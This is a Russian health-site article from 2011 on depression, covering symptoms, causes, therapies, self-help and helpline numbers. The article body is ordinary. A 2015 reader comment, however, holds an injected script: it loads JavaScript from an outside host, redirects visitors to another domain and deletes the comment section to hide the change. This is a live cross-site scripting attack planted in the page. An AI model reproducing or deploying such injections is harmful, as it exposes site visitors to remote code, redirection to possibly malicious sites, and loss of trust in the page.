Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Депрессия: когда все не в...  >>  Депрессия: когда все не в радость
 
Обратная связь
 

Депрессия: когда все не в радость

Размер шрифта
27 июля 2011 07:00
  • google_analytics: false
  • Нравится

23 июля скончалась известная английская певица Эми Уйанхаус. Одна из версий – глубокая депрессия на фоне употребления алкоголя и наркотиков. Отношение к этой смертельно опасной болезни не должно быть снисходительным, однако, в нашей стране еще не все осознают, что депрессия – это не временное расстройство настроения, а серьезная проблема, которую нужно лечить. О том, каковы симптомы депрессии и как с ней бороться – в сегодняшней теме дня.

Евгений Бузев / «Здоровье инфо»

Грусть-тоска и другие симптомы

Первый симптом депрессии – это плохое настроение и потеря интереса к жизни. От временной грусти депрессия отличается длительной продолжительностью. То, что казалось интересным и важным, теряет свою привлекательность, появляется чувство вины, собственной неполноценности, а иногда даже мысли о самоубийстве.

Нередко депрессию путают со стрессом. Это разные явления. Стресс – это кратковременная реакция организма на физическое или психологическое воздействие, для которого характерны физиологические изменения (при стрессе обычно происходит реакция тревоги, которая сменяется на реакцию истощения). Депрессия же может длиться несколько месяцев. Бывает и так, что депрессия развивается как результат частых стрессов.

Нередко болезнь проявляется и в физических симптомах, таких как бессонница (или, наоборот, слишком долгий сон), мигрень, постоянная усталость или же обострение хронических болей. Лечение депрессии способствует лечению связанных с ней физических симптомов.

Характерно для заболевания и изменения аппетита: он может пропасть совсем, а может, наоборот, обостриться. Поэтому от депрессии можно потерять вес, а можно, наоборот, много набрать.

Если депрессию не лечить, она скажется на карьере и личной жизни. Тяжелая ее форма может быть смертельно опасна, т.к. при депрессии люди чаще решаются на самоубийство.

Депрессия может случиться с каждым, но сильнее всего, как это ни удивительно, на ее появление влияет наследственность. Если к ней предрасположены родители, то у детей тоже повышаются шансы. Не так давно объяснение этому пытались найти израильские ученые. Был проведен ряд экспериментов на мышах, в результате которых исследователи пришли к выводу, что депрессия «маркирует» определенные гены, которые потом переходят по наследству. Кроме того, женщины в два раза чаще мужчин погружаются в депрессию. Это связано с изменением гормонального фона у женщин в детородном возрасте. В составе гормонов происходят значительные изменения, которые сказываются на всех аспектах состояния женского организма, в том числе и на психике.

Все дело в химии

Причина депрессии – нарушение баланса внутри группы химических веществ в организме, так называемых нейромедиаторов. Дисбаланс может случиться в результате психологической травмы, воздействия психоактивных веществ (алкоголь, наркотики) и даже при смене климата. В холодное время года процесс производства нейромедиаторов в организме сокращается, этим объясняется значительное число самоубийств в северных странах. Последний случай называется сезонным аффективным расстройством (САР). От него страдают около 3% человечества, оно обычно «накрывает» весной и осенью.

Еще одним распространенным типом депрессии является послеродовая. Она развивается у каждой четвертой женщины и может принимать тяжелые формы, затягиваясь на несколько лет. Этот тип депрессии опасен тем, что помимо здоровья матери на карту ставится здоровье и покой ребенка.

Случается депрессия и у детей (примерно у одного ребенка из сорока). Ее бывает сложно диагностировать потому, что дети часто прячут депрессию за угрюмостью или непослушанием.

От бесед до стимулятора

Никакой анализ крови, конечно, не выявит депрессию. Диагноз «депрессия» врач поставит только по тем симптомам, которые опишет пациент. Среди них физиологические симптомы, психологическое состояние, наследственный фактор, реакция на раздражители и продолжительность депрессии до обращения за помощью. Тщательный анализ поможет выявить тяжесть и тип депрессии, а это важный шаг в определении метода лечения. Медиками разработан ряд психологических тестов, которые используются для диагностики этого заболевания.

Эффективным способом борьбы с легкой и умеренной депрессией является психологическая терапия. Она сводится, в первую очередь, к беседам с врачом. Так, когнитивная поведенческая терапия направлена на изменение мыслей и поведения, ставшие причиной подавленного состояния.

Межличностная терапия изучает влияние отношений с близкими на настроение больного.

Психодинамическая терапия определяет, как на поведение влияют нерешенные вопросы и бессознательные чувства. Обычно для излечения хватает нескольких месяцев интенсивной терапии.

Лекарственные вещества, используемые в борьбе с депрессией, следует употреблять только по назначению и под строгим контролем врача. Действие антидепрессантов обычно начинает проявляться через несколько недель после начала приема. Наиболее эффективным методом лечения считается сочетание лекарств с другими типами терапии.

В качестве средства борьбы с депрессией сейчас применяется еще и такой метод, как световая терапия. Она подразумевает использование освещения, разной яркости и интенсивности. Точную «дозировку» и время при том или ином типе освещения, определяет врач.

В особо тяжелых случаях для лечения применяют такое радикальное средство как стимулятор мозга. Это специальное устройство, имплантируемое хирургическим путем, которое посылает электрические импульсы в мозг и может влиять на настроение.

Помоги себе сам

Бороться с депрессией можно и самостоятельно. Эффективный метод профилактики депрессии и борьбы с ней – это физические упражнения. Они способствуют выделению в организме гормона радости – эндорфина. Двадцать минут физических нагрузок каждый день помогут избавить вас от затяжной тоски. Алкоголь же не просто вреден для здоровья, это еще и фактор риска для депрессии.

Фактором, способствующим депрессии и усугубляющим ее, является одиночество. Вместо того чтобы сидеть в интернете, лучше завести новых друзей в реальной жизни: записаться в бассейн, отправиться на заседание дискуссионного клуба или… пойти учиться!

Однако самым эффективным способом остается обращение к врачу. Депрессия лечится. 80% людей в состоянии справиться с ней при помощи психотерапии и лекарств, да и со сложными случаями медики уже научились бороться. Не грустите!

Важно знать, что в каждом крупном городе есть специальные бесплатные телефоны психологической помощи. Специалисты, которые на них работают, могут помочь советом при депрессии и дать необходимые рекомендации. Например, в Москве можно звонить по телефону, (495) 575-87-70. А для детей и подростков есть единый телефон доверия, по которому можно звонить бесплатно из любого конца страны – 8 800 2000 122.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:09

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Болезни-близнецы. Депрессия и гипотиреоз   Морщины приводят к депрессии! Как нанести двойной удар и по морщинам, и по депрессии?   Сладкие газировки вызывают депрессию   Ботокс – спасение от депрессии  
01 апреля 2013Сладкие газировки вызывают депрессию 20 июля 2011Антидепрессанты приводят к депрессии
 
22 ноября 2012Ботокс – спасение от депрессии 24 февраля 2012Мигрень повышает риск депрессии у женщин
 

Слайдшоу

1
От чего умер Робин Уильямс?
Вся правда о депрессии
Как справится со стрессом без лекарств?

Тесты

Что вы знаете о депрессии?
Что вы знаете об СДВГ?
Есть ли у вас анемия?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.